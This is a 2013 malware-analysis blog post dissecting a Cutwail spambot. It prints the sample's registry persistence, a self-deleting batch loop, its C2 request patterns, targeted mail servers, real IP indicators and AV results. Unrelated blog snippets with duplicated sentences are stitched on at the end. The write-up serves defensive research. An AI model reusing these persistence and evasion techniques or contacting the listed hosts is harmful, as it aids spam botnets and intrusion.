Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="contacts.exe"
Content-Transfer-Encoding: binary
:
200 OK
Length: 93707 (92K) [application/x-msdownload]
Saving to: `sample.exe'
2013-05-29 17:50:10 (45.5 KB/s) - `sample.exe' saved [93707/93707]
What Payload Malware is this?
Firstly please see the details available in VT for I will skip those.
The payload register the autorun below:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\xoxkycomvoly(RANDOM)And do the self copy into:
→"C:\Documents and Settings\User\xoxkycomvoly.exe"
CopyFileA{The batch command (temporary/deleted file) executed:
lpExistingFileName: "c:\test\sample.exe",
lpNewFileName: "C:\Documents and Settings\User\xoxkycomvoly.exe", (RANDOM)
bFailIfExists: 0x0 }
:repeatAnd the sample will run the cascaded SVCHOST like below:
del %s
if exist %s goto :repeat
del %%0
Please noted the PID of sample2(the payload) and the two SVCHOST,
The payload is in charge for the HTTP remote connection (the botnet purpose):
While the both SVCHOST connected to some HTTP, HTTPS (Encryption) and SMTP (SpamBot):
If you squeeze the binary further you'll get the important traces as per below:
These are the HTTP used methods..
http://%s/?ptrxcz_%sStrings used to as flag for infected PC:
http://%s/
https://%s
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Accept: */*
Accept-Language: en
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: %d
Accept-Encoding: gzip, deflate
gzip
POST
GET
IsWow64ProcessSome targeted SMTP/Mail Server:
UndefinedOS
Win8
WinServer2012
Win7
WinServer2008R2
WinServer2008
Vista
WinHomeServer
WinServer2003R2
WinServer2003
WinXP64
WinXP
Win2K
// relay SMTP aftered..Strings used for
smtp.compuserve.com
mail.airmail.net
smtp.directcon.net
smtp.sbcglobal.yahoo.com
smtp.mail.yahoo.com
smtp.live.com
reactionsearch.com
picsnet.com
mville.edu
oakwood.org
intelnet.net.gt
optonline.net
cox.net
pga.com
rcn.com
vampirefreaks.com
tiscali.co.uk
msu.edu
freenet.de
bluewin.ch
o2.pl
cfl.rr.com
worldnetatt.net
uakron.edu
comcast.net
centrum.cz
axelero.hu
aon.at
oakland.edu
ukr.net
posten.se
talstar.com
cnet.com
emailmsn.com
yahoo.com.hk
vodafone.nl
zoomtown.com
otakumail.com
netsync.net
grar.com
stc.com.sa
col.com
gallatinriver.net
worldonline.co.uk
aruba.it
bluewin.com
zoomnet.net
gcsu.edu
amazon.com
microtek.com
voicestream.com
tellmeimcute.com
bmw.com
backaviation.com
oregonstate.edu
earthlink.net
cablelan.net
floodcity.net
uplink.net
mindspring.com
clarksville.com
dr.com
shmais.com
sexstories.com
cwnet.com
chickensys.com
gravityboard.com
happyhippo.com
midway.edu
oakwood.org
intelnet.net.gt
blackplanet.com
tampabay.rr.com
gmx.net
juno.com
vampirefreaks.com
canada.com
worldnetatt.net
beeone.de
idea.com
boardermail.com
arcor.de
verizonwireless.com
mediom.com
iw.com
passagen.se
iupui.edu
ufl.edu
jwu.edu
uga.edu
music.com
accountant.com
ministryofsound.net
the-beach.net
metallica.com
vodafone.com
zdnetmail.com
hoymail.com
iwon.com
accessus.net
cbunited.com
pchome.com.tw
kazza.com
cytanet.com.cy
frisurf.no
parrotcay.como.bz
willinet.net
claranet.fr
kw.com
caixa.gov.br
frostburg.edu
intuit.com
actuslendlease.com
rowdee.com
vodafone.nl
feton.net
wcsu.edu
ricochet.com
embarqmail.com
allstream.net
mynet.com
kcrr.com
south.net
ig.com.br
atkearney.com
colorado.edu
zoomnet.net
creighton.edu
amazon.com
mvts.com
potamkinmitsubishi.com
lansdownecollege.com
mania.com
marchmail.com
anetsbuys.com
yatroo.com
bassettfurniture.com
machlink.com
nccn.net
floodcity.net
maui.net
earthlink.com
doctor.com
mexico.com
sexstories.com
penn.com
aussiestockforums.com
bendcable.com
ipeg.com
mediom.com
free.fr
ufl.edu
www.aol.com
hotmale.com
cox.com
ministryofsound.net
stargate.net
orange.pl
mzsg.at
imaginet.com
charter.com
pandora.be
iwon.com
windstream.net
oakland.edu
suscom.net
metrocast.net
migente.com
erzt.com
willinet.net
claranet.fr
kw.com
rockford.edu
emailmsn.com
uymail.com
xtra.co.nz
brettlarson.com
badactor.us
stc.com.sa
t-mobel.com
yahoo.com.cn
gatespeed.com
itexas.net
yahoo.com.tw
diamondcpu.com
vail.com
clear.net.nz
gallatinriver.net
ia.telecom.net
idealcollectables.com
number1.net
agilent.com
in.com
windermere.com
mts.net
sscomputing.com
primeline.com
indosat.com
lansdownecollege.com
springsips.com
tellmeimcute.com
chataddict.com
expn.com
earthlink.net
surfglobal.net
Networking Activities
Logged SMTP sent activities...
// per domain
19:58:16.6989801 -> 65.55.96.11:smtp","SUCCESS"
19:59:03.0738552 -> www2.windstream.net:smtp","SUCCESS"
19:59:03.0739711 -> www.freenet.de:smtp","SUCCESS"
19:59:03.0740055 -> 67-208-33-32.neospire.net:smtp","SUCCESS"
19:59:03.1832375 -> 208.73.210.29:smtp","SUCCESS"
19:59:03.1833775 -> web1.gcsu.edu:smtp","SUCCESS"
19:59:03.1834395 -> searchportal.information.com:smtp","SUCCESS"
19:59:03.1834970 -> 176.32.98.166:smtp","SUCCESS"
19:59:09.0894742 -> www2.windstream.net:smtp","SUCCESS"
19:59:09.0896164 -> www.freenet.de:smtp","SUCCESS"
19:59:09.0896742 -> 67-208-33-32.neospire.net:smtp","SUCCESS"
19:59:09.1988465 -> 208.73.210.29:smtp","SUCCESS"
19:59:09.1989401 -> web1.gcsu.edu:smtp","SUCCESS"
19:59:09.1989982 -> searchportal.information.com:smtp","SUCCESS"
19:59:09.1990529 -> 176.32.98.166:smtp","SUCCESS"
19:59:21.1206896 -> www2.windstream.net:smtp","SUCCESS"
19:59:21.1208310 -> www.freenet.de:smtp","SUCCESS"
19:59:21.1208796 -> 67-208-33-32.neospire.net:smtp","SUCCESS"
19:59:21.2300697 -> 208.73.210.29:smtp","SUCCESS"
19:59:21.2302281 -> web1.gcsu.edu:smtp","SUCCESS"
19:59:21.2302759 -> searchportal.information.com:smtp","SUCCESS"
19:59:21.2303220 -> 176.32.98.166:smtp","SUCCESS"
19:59:33.9175361 -> www.colorado.edu:smtp","SUCCESS"
19:59:39.9331487 -> www.colorado.edu:smtp","SUCCESS"
19:59:47.0425029 -> centurylink.clap1.emerald.synacor.com:smtp","SUCCESS"
19:59:47.0426073 -> web-failover.machlink.com:smtp","SUCCESS"
19:59:47.1518818 -> members.aon.at:smtp","SUCCESS"
19:59:47.3706337 -> 195.214.195.105:smtp","SUCCESS"
19:59:47.3706803 -> static-199-91-125-78.b.awsrdns.net:smtp","SUCCESS"
19:59:47.3707130 -> 190.93.240.36:smtp","SUCCESS"
19:59:50.4331352 -> main13.maui.net:smtp","SUCCESS"
19:59:51.8550218 -> www.colorado.edu:smtp","SUCCESS"
19:59:53.0581188 -> centurylink.clap1.emerald.synacor.com:smtp","SUCCESS"
19:59:53.0582180 -> web-failover.machlink.com:smtp","SUCCESS"
19:59:53.1674956 -> members.aon.at:smtp","SUCCESS"
19:59:53.3862449 -> 195.214.195.105:smtp","SUCCESS"
19:59:53.3863597 -> static-199-91-125-78.b.awsrdns.net:smtp","SUCCESS"
19:59:53.3863929 -> 190.93.240.36:smtp","SUCCESS"
19:59:56.4487419 -> main13.maui.net:smtp","SUCCESS"
20:00:05.0893555 -> centurylink.clap1.emerald.synacor.com:smtp","SUCCESS"
20:00:05.0895655 -> web-failover.machlink.com:smtp","SUCCESS"
20:00:05.1987210 -> members.aon.at:smtp","SUCCESS"
20:00:05.4174687 -> 195.214.195.105:smtp","SUCCESS"
20:00:05.4175715 -> static-199-91-125-78.b.awsrdns.net:smtp","SUCCESS"
20:00:05.4176248 -> 190.93.240.36:smtp","SUCCESS"
20:00:08.4799646 -> main13.maui.net:smtp","SUCCESS"
// per IP Address..
19:58:16.6989801 -> 65.55.96.11:25","SUCCESS"
19:58:25.7770809 -> 212.227.97.23:443","SUCCESS"
19:59:03.0738552 -> 162.39.145.20:25","SUCCESS"
19:59:03.0739711 -> 62.104.23.42:25","SUCCESS"
19:59:03.0740055 -> 67.208.33.32:25","SUCCESS"
19:59:03.1832375 -> 208.73.210.29:25","SUCCESS"
19:59:03.1833775 -> 168.16.211.93:25","SUCCESS"
19:59:03.1834395 -> 208.73.210.88:25","SUCCESS"
19:59:03.1834970 -> 176.32.98.166:25","SUCCESS"
19:59:09.0894742 -> 162.39.145.20:25","SUCCESS"
19:59:09.0896164 -> 62.104.23.42:25","SUCCESS"
19:59:09.0896742 -> 67.208.33.32:25","SUCCESS"
19:59:09.1988465 -> 208.73.210.29:25","SUCCESS"
19:59:09.1989401 -> 168.16.211.93:25","SUCCESS"
19:59:09.1989982 -> 208.73.210.88:25","SUCCESS"
19:59:09.1990529 -> 176.32.98.166:25","SUCCESS"
19:59:21.1206896 -> 162.39.145.20:25","SUCCESS"
19:59:21.1208310 -> 62.104.23.42:25","SUCCESS"
19:59:21.1208796 -> 67.208.33.32:25","SUCCESS"
19:59:21.2300697 -> 208.73.210.29:25","SUCCESS"
19:59:21.2302281 -> 168.16.211.93:25","SUCCESS"
19:59:21.2302759 -> 208.73.210.88:25","SUCCESS"
19:59:21.2303220 -> 176.32.98.166:25","SUCCESS"
19:59:33.9175361 -> 128.138.129.98:25","SUCCESS"
19:59:39.9331487 -> 128.138.129.98:25","SUCCESS"
19:59:47.0425029 -> 208.47.185.65:25","SUCCESS"
19:59:47.0426073 -> 69.49.95.110:25","SUCCESS"
19:59:47.1518818 -> 195.3.96.72:25","SUCCESS"
19:59:47.3706337 -> 195.214.195.105:25","SUCCESS"
19:59:47.3706803 -> 199.91.125.78:25","SUCCESS"
19:59:47.3707130 -> 190.93.240.36:25","SUCCESS"
19:59:50.4331352 -> 69.174.243.94:25","SUCCESS"
19:59:51.8550218 -> 128.138.129.98:25","SUCCESS"
19:59:53.0581188 -> 208.47.185.65:25","SUCCESS"
19:59:53.0582180 -> 69.49.95.110:25","SUCCESS"
19:59:53.1674956 -> 195.3.96.72:25","SUCCESS"
19:59:53.3862449 -> 195.214.195.105:25","SUCCESS"
19:59:53.3863597 -> 199.91.125.78:25","SUCCESS"
19:59:53.3863929 -> 190.93.240.36:25","SUCCESS"
19:59:56.4487419 -> 69.174.243.94:25","SUCCESS"
20:00:05.0893555 -> 208.47.185.65:25","SUCCESS"
20:00:05.0895655 -> 69.49.95.110:25","SUCCESS"
20:00:05.1987210 -> 195.3.96.72:25","SUCCESS"
20:00:05.4174687 -> 195.214.195.105:25","SUCCESS"
20:00:05.4175715 -> 199.91.125.78:25","SUCCESS"
20:00:05.4176248 -> 190.93.240.36:25","SUCCESS"
20:00:08.4799646 -> 69.174.243.94:25","SUCCESS"
Some HTTP/HTTPS Connectivities...
(1) SSLv2 / https://x.x.x.x (SSL Operation for Authentication) 
(2)HTTP/1.1 - POST http://x.x.x.x 
*) This request is replied by the target mail relay information.
But there are also other response: 
↑is a botnet pokes.
(3)HTTP/1.1 - POST http://x.x.x.x/?ptrxcz_%s 
So many requests of these↑, I peek one: 
See the marked HTML data following the response,
it's an HTML code, I saved it into test.html below to see the contents: 
Which after you enter the captcha you will be redirected into unlimited possibility of pages... Yes, this is the trojan spambot for sure. Contains the data grabbed via its botnet to spread spams. So we know for real now how they're sent :-)
*)There are also so many 302 (redirection) and 403 (forbidden) as response to these (2) and (3)HTTP requests, I searched for the direct response cases only (noted: please see the PCAP in the sample for your deeper investigation)
Samples
For the research/education purpose and to raise detection rates of the infection components (not to only the payload), I share samples as per below data (click the pic to download): 
Eplilogue
We can't be sure what this malvertisement would like to infect us with. Since the first access in the pre-infection stage itself is a redirection to a Blackhole exploit Kit "closest" version (payload can be changed anytime by those moronz), thus post-infection stage is the botnet-base communication by the payload. So please be noted that what I posted is not static & the condition can be changed.
Many AV verdict stated PWS or Zbot, but to be frank, I didn't see much evidence to support that, instead the spambot function figured leads to MANY bad stuff driven by its botnet, and also we found some TDS & Phising backends. So I won't treat this threat as second priority that for the botnet access volume itself is outstanding. Again, this case is worth to dig & monitor further.
This is the series of the PayPal, eFAX, Chase malvertisement that I recently tweeted. The similar relay pattern and SMTP signatures of some samples positively confirmed this verdict, like one of the sample below (I peek eFAX one):
I wrote some pastes in analysis (the paste's LINK is in here -->>here) mostly these are PWS/Fareit (Credential Stealer) trojans (except this one). Since, again now we know for sure on how these messes are sent I bet we'll see more of these campaign for a while, we can guess that the same greedy bad actors is behind this, let's collect together every evidence needed to nail them.
[Additional/ Fri May 31 16:48:24 JST 2013] Thank's to @EP_X0FF of KM, for confirming the right malware name, this sample is confirmed as Win32/Cutwail Spambot Trojan, for your conveniences the decrypted sample by @EP_X0FF can be downloaded here -->>[KernelMode]. You can see that our previous written analysis made on binary traces made was correct by comparing with his decrypted sample. In additional the memory forensics data the list of domains targeted. VT check shows: (Link -->>HERE )
SHA256: 5f8fcc9c56bf959041b28e97bfb5db9659b20a6e6076cfba8cb2d591184c9164So now we know this campaign is not only sending PWS/Fareit or Cridex but Trojan/Cutwail spambot too.
SHA1: 95b3d8fe4ae65faa7f1bf66f56f067862ddceec2
MD5: 0c699bf8815137404fc43f6e56761ac8
File size: 45.5 KB ( 46560 bytes )
File name: MEMORY.dll
File type: Win32 EXE
Tags: peexe
Detection ratio: 29 / 47
Analysis date: 2013-05-31 04:44:49 UTC ( 2 hours, 58 minutes ago )
MicroWorld-eScan : Generic.Malware.SFBdld.738AD202
McAfee : Trojan-FBGJ!0C699BF88151
K7AntiVirus : Riskware
K7GW : Trojan
F-Prot : W32/Injector.A.gen!Eldorado
Norman : Malware
ByteHero : Virus.Win32.Heur.c
TrendMicro-HouseCall : Mal_DLDER
Avast : Win32:DNSChanger-ZZ [Trj]
ClamAV : Trojan.Downloader.Small-3221
Kaspersky : HEUR:Trojan.Win32.Generic
BitDefender : Generic.Malware.SFBdld.738AD202
NANO-Antivirus : Virus.Win32.Gen.ccmw
Sophos : Mal/Emogen-Y
F-Secure : Generic.Malware.SFBdld.738AD202
DrWeb : BackDoor.Bulknet.893
VIPRE : Trojan-Downloader.Win32.Cutwail.bz (v)
AntiVir : TR/Spy.Gen
TrendMicro : Mal_DLDER
McAfee-GW-Edition : Trojan-FBGJ!0C699BF88151
Emsisoft : Generic.Malware.SFBdld.738AD202 (B)
Microsoft : TrojanDownloader:Win32/Cutwail.BS
GData : Generic.Malware.SFBdld.738AD202
Commtouch : W32/Injector.A.gen!Eldorado
ESET-NOD32 : a variant of Win32/Wigon.PH
VBA32 : BScope.Trojan.Cutwail.4512
Rising : Trojan.Win32.Generic.14AC42DE
Ikarus : Gen.Trojan
Fortinet : W32/Pushdo.B!tr.bdr
Greetz from #MalwarMustDie to all friends, stay safe & be healthy always!
Thứ Năm, 23 tháng 5, 2013
10:24
nam tóc xù
Quite a few updates over the past few days. First and foremost, the bug with sURL is fixed.
Secondly, whilst the hpHosts site is still having issues, I've modified the config to try and alleviate the issue, so it should stay up longer than it was.
I've also got updates to a few programs going up over the next 72 hours or so (desperate for sleep, and my body and sleeping tablets have decided
Secondly, whilst the hpHosts site is still having issues, I've modified the config to try and alleviate the issue, so it should stay up longer than it was.
I've also got updates to a few programs going up over the next 72 hours or so (desperate for sleep, and my body and sleeping tablets have decided
Chủ Nhật, 19 tháng 5, 2013
03:29
nam tóc xù
Doing a quick search for something earlier, I stumbled upon pcguide.com, and whilst I'm now used to (but still hate) seeing security sites and support etc forums plastering ads all over the place (some even in the first and then every other, post), I still get irked when I see this kind of thing.
What makes this worse, is that it's not being delivered via an ad network this time - the "advert",
What makes this worse, is that it's not being delivered via an ad network this time - the "advert",
Thứ Tư, 15 tháng 5, 2013
09:27
nam tóc xù
Investigating a piracy case earlier, I was absolutely disgusted to see the following, which shows Tuguu, owner of PPI programs such as Doma IQ, engaging in practices that are so misleading they make hackforums.net look legit.
Not only does this fake flash player advert lead straight to a download that is NOT (like you didn't see that coming) Flash, but is so beyond not being flash that it
Not only does this fake flash player advert lead straight to a download that is NOT (like you didn't see that coming) Flash, but is so beyond not being flash that it
Thứ Hai, 6 tháng 5, 2013
22:37
nam tóc xù
Yet another instance of misleading advertising by SparkTrust was found a few minutes ago, this time via Google Adwords (surprise surprise).
And the site you're pointed to, also fails miserably, to notify you that the program is NOT free, that you HAVE TO PAY FOR IT, before it'll actually do anything other than scan.
You'd have thought these companies would've learnt by now, but sadly not,
And the site you're pointed to, also fails miserably, to notify you that the program is NOT free, that you HAVE TO PAY FOR IT, before it'll actually do anything other than scan.
You'd have thought these companies would've learnt by now, but sadly not,
Đăng ký:
Bài đăng (Atom)
